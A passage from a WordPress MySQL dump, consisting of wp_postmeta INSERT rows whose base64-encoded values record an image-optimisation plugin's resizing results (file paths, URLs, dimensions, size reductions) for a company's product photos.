jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYySC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MkgtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NjJILTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NTgsInRpbWUiOjE0ODM1NjUxMjAsImlkIjoxNzUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MkgtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjJILTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDYySC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDYwLCJ0aW1lIjoxNDgzNTY1MTIzLCJpZCI6MTc1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjJILTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYySC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ2MkgtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUyNiwidGltZSI6MTQ4MzU2NTEyNiwiaWQiOjE3NTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYySC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MkgtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NjJILTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNTIxLCJ0aW1lIjoxNDgzNTY1MTMwLCJpZCI6MTc1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MkgtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjJILTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDYySC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6Mzk5LCJ0aW1lIjoxNDgzNTY1MTMzLCJpZCI6MTc1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MkgtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjJILTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDYySC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTcwLCJ0aW1lIjoxNDgzNTY1MTM3LCJpZCI6MTc1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MkgtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjJILTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDYySC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTk0LCJ0aW1lIjoxNDgzNTY1MTQwLCJpZCI6MTc1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MkgtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjJILTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDYySC00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODA1LCJ0aW1lIjoxNDgzNTY1MTQzLCJpZCI6MTc1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MkgtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYySC05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDYySC05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM3NSwidGltZSI6MTQ4MzU2NTE0NywiaWQiOjE3NTF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29254, 1750, 'wpfc_optimisation_reduction', '27224'); 
INSERT INTO `wp_postmeta` VALUES (29255, 1750, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYwSC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MEguanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NTE1MiwiaWQiOiIxNzUwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjBILTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYwSC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ2MEgtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjkyMiwidGltZSI6MTQ4MzU2NTE1NSwiaWQiOjE3NTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYwSC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MEgtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NjBILTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjozMTY3LCJ0aW1lIjoxNDgzNTY1MTU4LCJpZCI6MTc1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjBILTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYwSC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ2MEgtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI4NDcsInRpbWUiOjE0ODM1NjUxNjIsImlkIjoxNzUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MEgtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYwSC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDYwSC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMzU3NiwidGltZSI6MTQ4MzU2NTE2NiwiaWQiOjE3NTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYwSC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MEgtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NjBILTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MjMsInRpbWUiOjE0ODM1NjUxNjksImlkIjoxNzUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MEgtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjBILTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDYwSC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTI3LCJ0aW1lIjoxNDgzNTY1MTcyLCJpZCI6MTc1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjBILTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYwSC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ2MEgtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjYwMCwidGltZSI6MTQ4MzU2NTE3NiwiaWQiOjE3NTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYwSC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MEgtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NjBILTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxOTk1LCJ0aW1lIjoxNDgzNTY1MTc5LCJpZCI6MTc1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MEgtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjBILTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDYwSC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDEzLCJ0aW1lIjoxNDgzNTY1MTgyLCJpZCI6MTc1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MEgtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjBILTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDYwSC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTY4LCJ0aW1lIjoxNDgzNTY1MTg2LCJpZCI6MTc1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MEgtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjBILTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDYwSC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjU4LCJ0aW1lIjoxNDgzNTY1MTg5LCJpZCI6MTc1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MEgtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjBILTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDYwSC00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTQ1LCJ0aW1lIjoxNDgzNTY1MTkyLCJpZCI6MTc1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2MEgtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDYwSC05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDYwSC05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM4MywidGltZSI6MTQ4MzU2NTE5NiwiaWQiOjE3NTB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29256, 1749, 'wpfc_optimisation_reduction', '22177'); 
INSERT INTO `wp_postmeta` VALUES (29257, 1749, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDUyTi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ1Mk4uanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NTIwMCwiaWQiOiIxNzQ5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NTJOLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDUyTi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ1Mk4tMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjc2NSwidGltZSI6MTQ4MzU2NTIwNCwiaWQiOjE3NDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDUyTi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ1Mk4tODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NTJOLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyNjc3LCJ0aW1lIjoxNDgzNTY1MjA3LCJpZCI6MTc0OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NTJOLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDUyTi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ1Mk4tNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjIzNzgsInRpbWUiOjE0ODM1NjUyMTEsImlkIjoxNzQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ1Mk4tMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDUyTi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDUyTi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMDY3NiwidGltZSI6MTQ4MzU2NTIxNSwiaWQiOjE3NDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDUyTi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ1Mk4tMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NTJOLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MjUsInRpbWUiOjE0ODM1NjUyMTksImlkIjoxNzQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY